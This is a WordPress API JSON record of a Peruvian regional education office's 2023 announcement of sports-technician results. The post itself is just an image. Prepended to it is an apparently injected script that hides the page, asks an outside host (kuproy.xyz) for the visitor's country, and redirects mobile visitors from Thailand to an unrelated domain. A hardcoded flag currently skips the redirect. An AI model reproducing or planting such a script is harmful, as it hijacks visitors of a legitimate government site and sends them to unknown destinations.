<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":3259,"date":"2023-06-15T17:00:26","date_gmt":"2023-06-15T22:00:26","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=3259"},"modified":"2023-06-15T17:00:26","modified_gmt":"2023-06-15T22:00:26","slug":"comunicado-n-o-166-2023-la-ugel-arequipa-norte-da-a-conocer-la-publicacion-de-resultados-finales-tecnicos-deportivos-winaq-ugel-an-2023","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n-o-166-2023-la-ugel-arequipa-norte-da-a-conocer-la-publicacion-de-resultados-finales-tecnicos-deportivos-winaq-ugel-an-2023\/","title":{"rendered":"COMUNICADO N.\u00ba 166 \u2013 2023 \u2013 LA UGEL AREQUIPA NORTE DA A CONOCER LA PUBLICACI\u00d3N DE RESULTADOS FINALES T\u00c9CNICOS DEPORTIVOS \u2013 WI\u00d1AQ UGEL AN 2023."},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"724\" src=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/RESULTADOS-TD-WINAQ_page-0001-1024x724.jpg\" alt=\"\" class=\"wp-image-3260\" srcset=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/RESULTADOS-TD-WINAQ_page-0001-1024x724.jpg 1024w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/RESULTADOS-TD-WINAQ_page-0001-300x212.jpg 300w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/RESULTADOS-TD-WINAQ_page-0001-768x543.jpg 768w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/RESULTADOS-TD-WINAQ_page-0001-1536x1086.jpg 1536w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/RESULTADOS-TD-WINAQ_page-0001-rotated.jpg 1754w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,8],"tags":[],"class_list":["post-3259","post","type-post","status-publish","format-standard","hentry","category-comunicados","category-gestion-pedagogica"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3259","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=3259"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3259\/revisions"}],"predecessor-version":[{"id":3261,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3259\/revisions\/3261"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=3259"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=3259"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=3259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}